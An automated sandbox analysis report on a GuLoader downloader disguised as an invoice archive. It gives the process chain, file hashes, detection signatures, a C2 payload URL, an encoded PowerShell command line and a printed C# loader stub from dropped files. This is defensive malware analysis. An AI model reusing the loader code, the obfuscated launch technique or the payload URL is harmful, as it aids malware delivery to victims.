    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623395 Sample: WWVN_INVOICE_8363567453.lzh Startdate: 10/05/2022 Architecture: WINDOWS Score: 84 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected GuLoader 2->48 50 C2 URLs / IPs found in malware configuration 2->50 10 unarchiver.exe 5 2->10         started        process3 process4 12 cmd.exe 2 2 10->12         started        14 7za.exe 2 10->14         started        signatures5 17 wscript.exe 2 12->17         started        20 conhost.exe 12->20         started        52 Potential malicious VBS script found (has network functionality) 14->52 22 conhost.exe 14->22         started        process6 signatures7 38 Wscript starts Powershell (via cmd or directly) 17->38 40 Very long command line found 17->40 42 Encrypted powershell cmdline option found 17->42 24 powershell.exe 20 17->24         started        process8 dnsIp9 36 192.168.2.1 unknown unknown 24->36 27 csc.exe 3 24->27         started        30 conhost.exe 24->30         started        process10 file11 34 C:\Users\user\AppData\Local\...\xd0x2kfy.dll, PE32 27->34 dropped 32 cvtres.exe 1 27->32         started        process12

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    WWVN_INVOICE_8363567453.lzh26%VirustotalBrowse
    WWVN_INVOICE_8363567453.lzh5%ReversingLabsScript.Downloader.Heuristic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    http://barsam.com.au/bin_FCWtLoO90.bin0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://barsam.com.au/bin_FCWtLoO90.bintrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000016.00000002.516470478.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://go.micropowershell.exe, 00000016.00000002.517426585.000000000512F000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      IP
      192.168.2.1
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623395
      Start date and time: 10/05/202214:00:442022-05-10 14:00:44 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 27s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:WWVN_INVOICE_8363567453.lzh
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:34
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winLZH@17/12@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 62
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .lzh
      • Adjust boot time
      • Enable AMSI
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      14:03:27API Interceptor36x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\SysWOW64\unarchiver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):388
      Entropy (8bit):5.2529463157768355
      Encrypted:false
      SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk7v:MLF20NaL329hJ5g522r0
      MD5:FF3B761A021930205BEC9D7664AE9258
      SHA1:1039D595C6333358D5F7EE5619FE6794E6F5FDB1
      SHA-256:A3517BC4B1E6470905F9A38466318B302186496E8706F1976F1ED76F3E87AF0F
      SHA-512:1E77D09CF965575EF9800B1EE8947A02D98F88DBFA267300330860757A0C7350AF857A2CB7001C49AFF1F5BD1E0AE6E90F643B27054522CADC730DD14BC3DE11
      Malicious:false
      Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..
      Process:C:\Windows\SysWOW64\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):58767
      Entropy (8bit):7.381111578760272
      Encrypted:false
      SSDEEP:768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
      MD5:7F53C5BDB8BE10B4244A89D5B4580B53
      SHA1:A2A3BF3829D0311E3BCC981D98B7FEE88B830055
      SHA-256:13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
      SHA-512:72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
      Malicious:false
      Preview:......h:....4$.....4$yY.,Z.._1..4.5|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5|..5EX....:.|..5...p8.V..~.qDoo........q.......=...uEy....]..h..|.....14|....[.O..i..:v...ur.d[...E.a.g..14|.o;...9.......=.|'ik.|......1.=d..~.5.5..O5|....;Y5|.]m.A.....5.C......}.._}.i~2.|...X.5..=.5.~...=....._......!......L.....O.&.5...4|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5|MF.....i.|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../|$
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):4.004105057259058
      Encrypted:false
      SSDEEP:24:Hoe9EuPVZ1XhHahhKE2mfII+ycuZhNolVakSJlaPNnq9qd:1PVZ1x6vK1mg1ulolVa3JlWq9K
      MD5:B0EC9E5060E4545FF7AD12F445BBA10E
      SHA1:0F3D3E213E6B6A0DFEE51803071A3F8744CF24EE
      SHA-256:4D14F17614C660907F32380B31E715184122DD9F9489E2CB584A82F5DD27DB36
      SHA-512:F115A762435FAA1C463DC89DF4FF4BE6CC76B1F15AB3E352CF1B4886BA444AA7E2DCCDA5A7F1EFF14E459F4538D531160C34B6F3A24F92F92C68CD497578866A
      Malicious:false
      Preview:L...%.zb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP.................!Z.....A.Z...p..........4.......C:\Users\user\AppData\Local\Temp\RES571F.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\SysWOW64\7za.exe
      File Type:ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):233243
      Entropy (8bit):4.783519118829289
      Encrypted:false
      SSDEEP:3072:pzLcTyRQ+PUQSsYwqV0SuKiSMq+fxS9XZgrrfIhAvL18lALuDYx7Pu2nNQ:pzPRQ+Qp3ZCtG2+
      MD5:9F8E253FD51C33A2F874942EBC0D3795
      SHA1:6868A9005489E56542CF0DF063985132FEF50F3D
      SHA-256:C33E4E9BF305CEC123840DD87AA84C6D71E68AC82EA039418E1B8BE3ED791B37
      SHA-512:EB61932008B275FDE416E7E9DF71B0EFAEC9FEEB1A33AF8B98D6C582FAD3A9BC91CFD4450589D3FB0A7CB6601D967C8FFA5F6D023CBBF167F2EB1AC35B054B8C
      Malicious:false
      Preview:'IRIDI LLAN bedgownd Misdem rvful Huntsville chor LANDSFO Aftere Klito4 Agterin LEON stavep TROER corrective ADIPS form ..'Salonrifel9 till monorimeek Ungef7 unikae FJERNKONT NYTAARSTAL Monoxylone telfonm EVECKMI pligtigts GRIDDLEB flgeska KILLBUCK Fasciolar POSTCAVAL MEDIA Tremaetc5 SYMPATIS tilr DISP sleddedas Bonde aabnings MRKELGG Evakue4 Styrkel Trokl Busesubse2 Ungkvg sdbank ..'Outsol GARBEDANS OKSEHO Taeni Psizedo3 EVASIO PHASEO Tamiletsa Scat thridacium LETFRD Fontaine3 sogneprs Dikag NATURA UGLESEEN Sols Ubarmhje8 Ufordjet4 Fibrilla7 Heckim6 VGGETJE Elek skrmformat ..'HAVANCE NOTELES bedv UDVIKLING NIVERNAIS Pruinoseh Passadesu9 Puttie disa samtaleem Konst DICTUMSF Ulykkess Topia VIBICESDE Brimm9 Afterwor stik Udva budgedbr Unencomp4 inderkr Distinctio8 Rensk8 Atkasn7 vragr poll UDSME KARDU Blaa5 SIDEB Samleta2 ..'Kettlec Bverrot Forulem4 EMUSGRA Taalmodigh6 Coan Udsondrend5 TEMP lacunulose Skkel1 Puff3 Entrench kuls monologia GLOBULITI gang Lithyin3 Dvekonsule3 Anci9 Unhor9 U
      Process:C:\Windows\SysWOW64\unarchiver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1484
      Entropy (8bit):5.220609326683011
      Encrypted:false
      SSDEEP:24:OmIkTHiJ1iJjWI1iJ1iJUwPiJfgJ0iJ1iJFTEIhiJbriJ/IhiJoniJvriJ1iJxpX:OCTHG1Gb1G1GpPG4J0G1GpVGbrGkGqGB
      MD5:1A42F581BED47873DA816E9099BE908B
      SHA1:CF1E6BE6927B01CF89DB831A192ED38E39FE6D21
      SHA-256:54C67ECB8096700214EE886CABC4EB1E4B484A3B7B9FDB5ADF20B8B946BB17A7
      SHA-512:4284BC6B7060162DAC693E2AEC9123232A4DF2FCF28D0991F365D6C22ADD7E38C2780383E6012860672557140621D954D2DF00365F13DAA8754A47E330E1C355
      Malicious:false
      Preview:05/10/2022 2:01 PM: Unpack: C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: Scanning the drive for archives:..05/10/2022 2:01 PM: Received from standard out: 1 file, 73940 bytes (73 KiB)..05/10/2022 2:01 PM: Received from standard out: ..05/10/2022 2:01 PM: Received from standard out: Extracting archive: C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Received from standard out: --..05/10/2022 2:01 PM: Received from standard out: Path = C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh..05/10/2022 2:01 PM: Received from standard out: Type = Lzh..05/10/2022 2:01 PM: Received from standard out: Physical Size = 73940..05/10
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.1106579435914563
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryilVak7YnqqJlaPN5Dlq5J:+RI+ycuZhNolVakSJlaPNnqX
      MD5:84215AD9E285C4F0F9410E5AEADA0E70
      SHA1:4742FEB9B2E98B937DAF14984AB550D33BFD9D94
      SHA-256:9E2265A3B8030D91FB3A9BF8D4C6BD03211CF9643FDB5E6B39F6BC4855F1FF20
      SHA-512:A7513C2FAC06CF52E45C9448C83D431D8DC5DDCAB18399FDA10D2888F561066F91FE2E0FC5C8462CB1179FCA5173894AE7EDA7854E98700AB0A3E6F320C97F09
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.d.0.x.2.k.f.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):882
      Entropy (8bit):5.226399550729973
      Encrypted:false
      SSDEEP:24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
      MD5:EA505B82FAD07E00D99FD3C7A36FF79A
      SHA1:68B8F59916AFB004F83158D741B1C75E02F2E83B
      SHA-256:AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
      SHA-512:BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.326693439812667
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fVHNtqzxs7+AEszIWXp+N23fVHNtP:p37Lvkmb6KHVNtqWZE8VNtP
      MD5:869E92FF635D9FED689AFE20E52D58ED
      SHA1:C19D30EC578084E24EDBE707EBFCC63DC6FDAEBE
      SHA-256:9D28F86DE8DF3A43B8DE93AC8A3AD64A7292FA05E781EDAADC33A40B12A70335
      SHA-512:BA57011564C6DBD4DF17A58D2DD3725E55C01047C0A019E55E73972AD36E16560442F45DBFC03A162FC94253E40B6F8DB6D116DF8A29A97D20F14A318C508C3A
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.27949206385496
      Encrypted:false
      SSDEEP:48:63PW4BCJTLrL9CzfXK4j5SuJG5ZO1ulolVa3JlWq:aW3J/H9m3SLtYK
      MD5:0714DE4FE2608F69E235ADAE7871568F
      SHA1:B163DC964F2F1D77CD8A59BA8C1BAFF690D1DDD7
      SHA-256:7888C50A8E40D31D9F018571271888E34438B3031057C2192434E9D44EDA3EEB
      SHA-512:CC5E6F4640D3DAE3AC7C41C528A44EDF934841BC9880AA6966A972AE94B54D3AE10C00AD837E9FF77E1153A9288BE6636CB0A93407B6A2EE8FF35FD94B53DECC
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%.zb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................|.....|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.358268581824368
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHVNtLE8VNt2KaM5DqBVKVrdFAMBJTH:Uika6AVNtLE8VNt2KxDcVKdBJj
      MD5:A2EBBF9F008E3D339A66CF363B953698
      SHA1:9D6B4B709B38E26C02E63649F8B6C1BA0EF09D43
      SHA-256:F2668F01FC8A7EDDA9F2257FFEE8DA1BC623D35FDD46A5395F3BB5427C39C640
      SHA-512:7BB9D621BA592C8BD2EE94B0D8028D72F3F62B0FA10333773008BC9B0DAE32B610E516603375EEC16708451B73FB8C947E0DBCA387282582AEA09114AE6AA0B3
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type: LHa (2.x) archive data [lh5], with "WWVN_INVOICE_8363567453.vbs"
      Entropy (8bit):7.997133909457168
      TrID:
      • LHARC/LZARK compressed archive (6/4) 100.00%
      File name:WWVN_INVOICE_8363567453.lzh
      File size:73940
      MD5:1492683d46a38dc3af26589b486d55ab
      SHA1:d7dd2f48e26ca1683643f5671d5a5b7a26da73e0
      SHA256:8e55ce0d37045fc2d93dde800ae6fea90c6c71d29c5b28837a61d749d5a7810f
      SHA512:6c7b511d4b1af00245aa2ca2c16b3cd6b43f8ab53862dc2e27c1c1110a22337d5754546312265a7a89ab2c8c054275ecdb3071162d42e527993c3edcc3ee3a23
      SSDEEP:1536:m95dctU9sV5fvcFVmKSLPztJupjcaUwT0jVkQsoqaEnAu533XByCm:mVV0KSrzSt6w4VkQvqaEnAuZXB7m
      TLSH:3273025F5872AA4774EF0036B341C768FBA931893869F39714886BDB1D1BF91118AC8C
      File Content Preview:11-lh5-. ......'..T ..WWVN_INVOICE_8363567453.vbs..:X.}v.9m....u.......-.r...{.j.U...2LRL.......^..q]...w....}_V..fo.=.< ~3...b9..C....8.....b0..d1..y.w......._.......|x.a....g.....V..=.m.||..........^.:.vm.|.s..p....n.=..yl.8c.?...8.....-.->8tsr.....v...
      Icon Hash:00828e8e8686b000
      No network behavior found

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:14:01:45
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\unarchiver.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
      Imagebase:0x470000
      File size:10752 bytes
      MD5 hash:F737DE1D0C50E20064ACCB6647B50F6C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:1
      Start time:14:01:47
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\7za.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
      Imagebase:0xfc0000
      File size:289792 bytes
      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:14:01:47
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:6
      Start time:14:01:52
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
      Imagebase:0xc20000
      File size:232960 bytes
      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:7
      Start time:14:01:52
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:8
      Start time:14:01:53
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
      Imagebase:0x2a0000
      File size:147456 bytes
      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:22
      Start time:14:03:01
      Start date:10/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAA